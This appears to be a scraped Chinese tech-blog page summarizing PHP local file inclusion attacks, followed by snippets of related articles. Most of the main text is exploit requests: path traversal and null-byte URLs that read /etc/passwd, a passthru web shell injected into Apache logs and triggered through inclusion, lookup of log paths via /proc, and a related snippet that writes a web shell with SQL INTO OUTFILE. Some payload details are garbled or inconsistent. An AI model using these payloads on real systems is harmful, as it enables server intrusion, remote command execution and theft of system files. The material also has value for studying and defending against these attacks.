php 命令执行脚本文件路径,PHP文件包含与命令执行方式总结

最新推荐文章于 2023-04-29 17:51:26 发布
最新推荐文章于 2023-04-29 17:51:26 发布
阅读量370 收藏
点赞数
文章标签: php 命令执行脚本文件路径

1、文件包含利用

通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell.

Type of call:

require($file);

Exploit:

http://host/?file=/etc/passwd

Type of call:

require("includes/".$file);

Exploit:

http://host/?file=../../../../../etc/passwd

Type of call:

require("languages/".$lang.".php");

require("themes/".$theme."/config.php");

Exploit:

http://host/?file=../../../../../etc/passwd%00

Type of call:

require("languages/".$_COOKIE['lang'].".php");

Exploit:

javascript:document.cookie = "lan=../../../../../etc/passwd%00″;

2、包含命令执行

当能够把这句代码 passthru($_GET[cmd]) ?> 上传到服务器,然后利用文件包含就可以。

利用方式1:将内容插入apache日志里面。

请求不存在的页面:http://host/xxxxxxx= passthru($_GET[cmd]) ?>

然后按照前面的方式请求:

http://host/?file=../../../var/apache/error_log&cmd=ls /etc

http://host/?file=../../../var/apache/error_log&cmd=uname -a

如果不知道apache地址,可以利用包含已有的文件报错来爆出当前位置,当然这个也得依靠不同的操作系统,apache默认地址不一样。

另外可以通过枚举进程表来定位apache日志路径。/proc/{PID}/fd/{FD_ID}

pepelux:~$ perl proc.pl http://host/index.php page GET

Apache PID: 4191

FD_SIZE: 64

FD: 2

得到PID 和 FD_ID后就可以这么构造。

http://host/?file=/proc/4191/fd/2&cmd=uname -a

http://host/index.php?x= passthru($_GET[cmd]) ?>

盗心魔幻
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php命令行(cli)下执行PHP脚本文件的相对路径的问题解决方法
10-24
然而,当在PHP命令行环境下运行脚本时,可能会遇到一个常见问题,即相对路径无法正确解析,导致文件包含或者其他文件操作失败。本文将详细介绍如何解决这个问题。 首先,我们需要理解的是,在命令行下执行PHP脚本时...
如何命令执行php文件,Linux系统使用命令执行php文件传参的步骤
weixin_34430334的博客
03-10 230
Linux用户们经常会遇到php文件,面对这些php文件,我们有时会使用命令执行php文件进行传参。不过具体该怎么操作呢?今天小编就来给大家讲解一下Linux系统中通过命令执行php文件进行传参的方法吧。具体操作步骤:要做多语言搜索索引,可是php程序要通过在Linux系统的php命令执行文件,这样php程序文件中的变量便无法获取。所以要进行传参,但是命令行下执行php,是不走apache等...
文件包含及代码执行命令执行
j1044957016的博客
06-01 2529
文件包含,代码执行命令执行常见的函数,以及如何绕过过滤
文件包含这一篇就够了!
最新发布
qq_33137821的博客
04-29 458
本文章仅供学习所用
PHP文件包含命令执行方式总结
baidu_33260220的博客
11-25 2727
转自:http://www.myhack58.com/Article/html/3/7/2012/36277.htm 1、文件包含利用 通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell. Type of call: require($file); Exploit: http://host/?fi
13-如何执行PHP脚本
phantom66的博客
04-24 2074
前面介绍了PHP的生命周期,PHP的SAPI,SAPI处于PHP整个架构较上层,而真正脚本执行主要由Zend引擎来完成, 这一小节我们介绍PHP脚本执行。目前编程语言可以分为两大类: 第一类是像C/C++, .NET, Java之类的编译型语言, 它们的共性是:运行之前必须对源代码进行编译,然后运行编译后的目标文件。 第二类比如PHPJavascript, Ruby, Python这些解释型
如何利用PHP执行.SQL文件
10-27
这个简单的实现适用于大多数基本的SQL文件执行场景,但可能不适用于更复杂的SQL脚本,如包含事务或嵌套查询的脚本。对于这类复杂情况,可能需要更高级的解析和执行逻辑,或者使用支持事务的数据库连接方法。 为了...
php-fpm可执行文件出现乱码的解决方法
09-15
在使用PHP-FPM (PHP FastCGI Process Manager) 运行PHP应用程序时,有时可能会遇到可执行文件显示乱码的问题。这通常是由于编码设置不正确或者配置文件与系统环境不匹配导致的。以下是一些解决PHP-FPM可执行文件乱码...
win7计划任务定时执行PHP脚本设置图解
10-25
如果没有添加到PATH,你需要指定PHP执行文件的完整路径,如`C:\php\php.exe`,然后在“添加参数(A)”中写入脚本路径,如`-f "C:\path\to\your\script\test.php"`。 6. 确认无误后,点击“下一步”,在最后的确认...
聊聊php脚本执行流程
lucas1018的博客
02-06 1645
很多地方都能看到 php 的生命周期分为五个过程: 模块初始化 -> 请求初始化 -> 处理请求 -> 关闭请求 -> 关闭模块 问题是怎么就知道分为这几步了呢?今个从源码角度来看看。写一个简单的 php 脚本,从 gdb 调试开始: [root@localhost ~]$ cat test.php <?php echo 'hello world!'; [root@localhost ~]$ gdb php GNU g...
命令行下运行PHP脚本
wgchen
02-23 803
命令行下运行PHP脚本
script执行php文件_php命令行(cli)下执行PHP脚本文件的相对路径的问题解决方法...
weixin_32421193的博客
03-08 295
php命令行下执行.php文件时,执行环境的工作目录(getcwd( ))是php命令程序(php.exe)所在目录,所以如果想在文件内使用相对路径时,要先切换当前的工作目录才行。小测试程序:$oldpath = getcwd(); // 原始工作目录 php.exe所在目录$path = dirname(__FILE__);chdir($path); // 切换工作目...
PHP执行 PHP 文件
希望我的博客,能帮上你解决学习中工作中所遇到的问题
10-09 1951
PHP执行 PHP 文件
php调用python脚本 参数_PHP程序运行Python脚本(接收数据及传参)
weixin_36068140的博客
02-28 1084
介绍一下,如何在php程序中运行Python脚本,在php中python程序的运行,主要依靠 程序执行函数,这里说一下三个相关函数:exec(),system() 和 passthru()。这里主要讲 exec() 函数,介绍使用该函数传递参数,以及如何使用python返回josn数据供php使用。一、exec() — 执行一个外部程序exec ( string $command [, array...
php获取执行路径,PHP获取当前所在目录位置的方法
weixin_35651855的博客
03-09 778
这篇文章主要介绍了PHP获取当前所在目录位置的方法,涉及getcwd(0函数的用法以及相关的PHP目录操作函数的使用技巧,具有一定的参考借鉴价值,需要的朋友可以参考下本文实例讲述了PHP获取当前所在目录位置的方法。分享给大家供大家参考。具体分析如下:如果要获取脚本文件的目录,要应用函数getcwd()来实现。函数声明如下:string getcwd ( void ) ;成功执行后返回当前目录字符串...
PHP执行Shell脚本或Bash脚本文件并返回命令输出详情
10-29 3232
PHP执行shell脚本或者Bash脚本文件实例。system和exec函数可能被配置文件禁用,可以通过修改php配置文件删除被禁用的函数。
php 如何自动执行脚本文件,使用php作linux自动执行脚本
weixin_39628256的博客
04-03 245
php作一社区, 在写到计算最高上线人数时, 成功调试出把PHP作为 shellscript直接在服务器上运行.在作社区时, 时常需要统计上线人数等数据. 一般做法是, 把这段代码放在用户login或者某一个页面中, 以便在用户登录或访问到该时,触发运行该代码. 这样一来, 会造成一个问题, 如果该代码教复杂, 明显减慢该页的正常调用速度.利用PHP 的这种特性,加上linux的crontab指...
php 重新执行脚本,PHP脚本执行
weixin_39942400的博客
03-21 289
在前面的章节介绍了PHP的生命周期,PHP的SAPI,这些内容都是处于上层的,在这个下面是对于PHP本身的解析和执行。这一小节我们介绍PHP脚本执行。目前的编程语言可以分为两大类:第一类是像C/C++, .NET, Java之类的编译型语言, 它们的共性是: 运行之前必须对源代码进行编译,然后运行编译后的目标文件.第二类比如:PHP, Javascript, Ruby, Python这些解释型语...
php命令执行脚本文件,PHP文件包含命令执行方式总结
weixin_39580715的博客
03-10 190
如果不成功,把”,1 into outfile “/var/www/host.com/www/phpinfo.php”如果目录不能写,可以先导出到tmphttp://host/?id=-1 union select 1,” passthru($_GET[cmd]) ?>”,1,1 into outfile “/tmp/sql.txt”...
PHP文件系统函数详解:操作与管理文件
"PHP脚本编程中的文件系统函数库提供了丰富的功能,用于处理和操作文件及目录。这些函数包括文件的读写、属性修改、权限设置、文件检测以及目录管理等多个方面,使得开发者能够轻松地在PHP环境中进行文件系统的交互...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值